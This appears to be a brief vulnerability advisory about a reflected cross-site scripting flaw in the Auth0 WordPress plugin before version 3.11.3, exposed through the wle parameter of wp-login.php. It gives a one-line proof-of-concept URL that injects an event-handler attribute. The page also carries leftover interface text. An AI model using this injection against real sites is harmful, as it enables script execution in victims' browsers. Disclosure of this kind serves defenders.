🤬
8 lines | ISO-8859-1 | 215 bytes

Auth0 < 3.11.3 - Unauthenticated Reflected XSS via wle Parameter

Description XSS via a wle parameter associated with wp-login.php.

Proof of Concept

WP/wp-login.php?wle=%22%20onEvent%3DX186697040Y2Z%20 
Please wait...
Page is in error, reload to recover